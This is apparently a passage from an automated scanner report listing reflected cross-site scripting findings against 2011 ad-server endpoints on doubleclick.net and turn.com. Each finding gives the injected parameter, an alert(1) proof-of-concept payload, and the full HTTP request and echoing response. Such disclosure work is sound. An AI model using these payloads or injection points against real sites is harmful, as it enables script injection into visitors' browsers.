Mvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=f9596"-alert(1)-"aec72338c29http://www.tdameritrade.com/offer/250freetrades/?a=NVX&o=199&cid=GENRET;877237;62578498;239944784;41336049");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";

...[SNIP]...
7.2. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [ai parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6a68d"-alert(1)-"b83921a49ea was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT6a68d"-alert(1)-"b83921a49ea&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:26:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT6a68d"-alert(1)-"b83921a49ea&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyN
...[SNIP]...
7.3. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [client parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e083d"-alert(1)-"fd19c0fdbf9 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088e083d"-alert(1)-"fd19c0fdbf9&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:28:26 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088e083d"-alert(1)-"fd19c0fdbf9&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSp
...[SNIP]...
7.4. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [num parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f777b"-alert(1)-"69d52534c85 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1f777b"-alert(1)-"69d52534c85&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:27:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
mh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1f777b"-alert(1)-"69d52534c85&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0
...[SNIP]...
7.5. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sig parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f37f3"-alert(1)-"174e9b66d51 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fgf37f3"-alert(1)-"174e9b66d51&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:27:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fgf37f3"-alert(1)-"174e9b66d51&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwy
...[SNIP]...
7.6. http://ad.doubleclick.net/adi/N3941.InviteMedia/B5414127.32 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3941.InviteMedia/B5414127.32

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2a167"-alert(1)-"e2b4b064d7c was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adi/N3941.InviteMedia/B5414127.32;sz=160x600;pc=[TPAS_ID];click=http://googleads.g.doubleclick.net/aclk?sa=l2a167"-alert(1)-"e2b4b064d7c&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5odWxrLm5ldC9mb3J1bXMvc2hvd3RocmVhZC5waHA_MTI2Mjg1LVJlYXItYm9hcmRpbmctc3RlcJgCyAbAAgXIApWysAuoAwHoA_QI6AORAugDL-gDFPUDAAEAxIAG_9qsrNmGuekT&num=1&sig=AGiWqtxGm_6Saz9O7PUXbCqI4ekaKkw5Fg&client=ca-pub-4675364852109088&adurl=http%3A%2F%2Fva.px.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJyrVjI2VrJSMDI1NDLTUVAyNgJyTC0NjcxNgTxDIEcpJMkkKKLc0cMv18LbNL_Moygnwyep3NZWCaQcpKA0LzsvvzwPxAfpNgHSpiAjjcwMgUwTIDOvNCcHyDQDMs2MLCwtawFithu3%26redirectURL%3D;ord=Tb4RXwAHNm8K5ovHrlhLbw==? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4675364852109088&output=html&h=600&slotname=7606683569&w=160&lmt=1304337917&flash=10.2.154&url=http%3A%2F%2Fwww.greenhulk.net%2Fforums%2Fshowthread.php%3F126285-Rear-boarding-step&dt=1304319912584&bpp=8&shv=r20110427&jsv=r20110427&prev_slotnames=8870801362%2C8870801362&correlator=1304319912561&frm=0&adk=645557951&ga_vid=1539471416.1304319910&ga_sid=1304319910&ga_hid=984664005&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1025&bih=903&fu=0&ifi=3&dtd=5628&xpc=DefJdIvudC&p=http%3A//www.greenhulk.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 02 May 2011 02:26:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 8907

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve
...[SNIP]...
/click%3Bh%3Dv8/3afb/f/2e6/%2a/b%3B239944784%3B0-0%3B0%3B62578498%3B2321-160/600%3B41336049/41353836/1%3B%3B%7Eokv%3D%3Bpc%3D%5BTPAS_ID%5D%3B%3B%7Esscs%3D%3fhttp://googleads.g.doubleclick.net/aclk?sa=l2a167"-alert(1)-"e2b4b064d7c&ai=BNedOXxG-Te_sHMeXmgfvluHyCq3mhMIBhcPSjhf9072UVwAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi00Njc1MzY0ODUyMTA5MDg4oAGrl7rtA7IBEXd3dy5ncmVlbmh1bGsubmV0ugEKMTYweDYwMF9hc8gBCdoBSGh0dHA6Ly93d3cuZ3JlZW5o
...[SNIP]...
7.7. http://ad.doubleclick.net/adj/wpni.jobs/front [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/wpni.jobs/front

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de551'%3balert(1)//17b4bcec7f4 was submitted in the sz parameter. This input was echoed as de551';alert(1)//17b4bcec7f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/wpni.jobs/front;sz=de551'%3balert(1)//17b4bcec7f4 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1672981/717726/15092,1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 355
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 01 May 2011 23:34:06 GMT
Expires: Sun, 01 May 2011 23:39:06 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3afa/0/0/%2a/d;240396230;0-0;0;5742660;255-0/0;41867457/41885244/1;;~okv=;sz=de551';alert(1)//17b4bcec7f4;~aopt=2/1/ff/1;~sscs=%3fhttp://www.esri.com/washpostrecruit">
...[SNIP]...
7.8. http://ad.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6123"><script>alert(1)</script>730c7e9bf00 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=b6123"><script>alert(1)</script>730c7e9bf00 HTTP/1.1
Host: ad.turn.com
Proxy-Connection: keep-alive
Referer: http://websiteprice.net/result/?id=65934
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=oc31gwEy48Gj8krzQw73EBoEjcG1bqtgAhdY5dPP6ju3jDofrxsmuCTvYsogrEH2xEdzmswgsukEeGYUFx4XIGn96wzml5HD9lJW6BrLMriX4Qp5J-iSAILnbVuT-E5IREBfIGiYWGHD9doGCH1wTar1Ljo6rmrwvUfLD268riQ_eup_DpbPuBi-l0uJC1Cg4iLKE3m6yPkT4AvF4oP9oeNNhqUqWWKxkKKCASI5qJlvk_9VLZTj7a6KtdEck6wr6DFVYP-MYaTbZ4ws-0Ho4FXQPmkWV5jQz-5UiNsEEhvxiXU1a4m91l6ZX-BGzKFgQJNlreCDghOImQ4gRHHvmC5GHY348Bc_WZnzcI0VR4YvuQujLl79zvKR2S726iXFsmC2TBuMEChaKXWLs9cgZB0incj89wDLnXHT52iHDHK91RrQ27EszZdb-m7F5Z4-bue8qHNbsTHJNQl-2pL0ZG0hwnXfA6pW6CsklBZ89oOVqdwGYKKhumhVBkqqo3Ys1DU5ZHL7bkHlIMAbvVz1elMMA2GPVMOGM2LfNAYjph1mNJd5luOw6SSQJcXlXWPWtpw9QE8NMiKoMBMwAE0wE8TSsoYJA9urnx_stSxmhLBFDC-8K5inxoxE8wGPF2FyUHy8b-okk6im_ZzfepmMuVuCDmkU9WDCEErM3oXbeXprQ6Y_KEOJb4XRzmM360y1n2R2Vau7X5-cMnEdJ6r2Z4lgdvHdm53MAZaS0O0Qlfxblav9J01d-B7FA05rcUpzgSpee0pzn-zH34TLYJh2OKjNQuLSL_AER0bCrOYMby51tKibbkc9lEQA79dAymt-_4bu8BZkNrY1dGDCWhKzPhCgeWsgGfMkFX4HzQVWQqG4Cixbn_O81MTq6ekw_dLHK7vwvVc__HoujX-rjAjR3fbMQ1AjOb6Pr4jgrYjDtyFKZvpYeFbSXUE6w756Ru85tQu8lUYlKGvasVyy9QYM_B0WBtI2yRBemK9kaaXMyiY8IDVrzMbqYXE386Rx4FMoQUDpfRJBGqtBoTosifDAXjUdyE9wm6P5iu9zsNESpsE8gIIJ-aKXbtqqpxzFI5pWR1qd1OhaEJRBKLAzmtvuivo0-pmNnod7XpkHS_mmXlKfpApTInsgNHms4PzjBXGobcMMMjS9iaNWi3nIBc-51c_JNpPFelEoDpghJ_BqYKOem8Gm5pQ8dK01urDrHrdgdmyMP9WTc5eMuMfkiu-eA3R2-iCXKT-zVBd4UH-JQfMPGyLnI8FUiI8OWL7jpWFWMZXEO7OyP6JiqfKIhCGNeSxq9V44CTPsg5_09Wd_LC0N7IQXI_2WJof_8fVyPUPeh7i9wBeFplG6RcT1DtZks0sgI_IwrDwCsIS7dyiB1wNxFEDYn_de44gYmemzlgWEN26EYZGTlI4Lq2yzlU6q8m2PJX70K9ebeZIcYddS-n-jieHPeyyu_jPtNqgptNcUmlV27b50rDjEeb2aBWozrQGGuaCuFh4EzkxFsuZfPMfz1wEUboblTM7IARMSnc4jK5cJ07WSHutHBj52x3HKg14YQzFgcP1P7PF5ywq-vIL6XCfyxzfzz2QN8CpQbL5XAGhY8gq3gpxC6wpgzazfLg6emeoHtpGq3OLLxjUCIgW6QbledKeLvEwl1YIoSBsuVGm7co3E1SW7gk8dGKQMCkAGpZKu6HCuT5IaT2X4ICpHWp3U6FoQlEEosDOa2-6KcE78SWnWn9Zb9yonwZsEYlrtijogmP4oEG53-k_J-gIZe1NM6Xn8UuPCrNFrZlxt9r7cwJ0GaDm-wxC-RC7eiJ6bwabmlDx0rTW6sOset2ClcZFZrKS1YgYe9ikET6IQCL-FWN7W8AgIfx031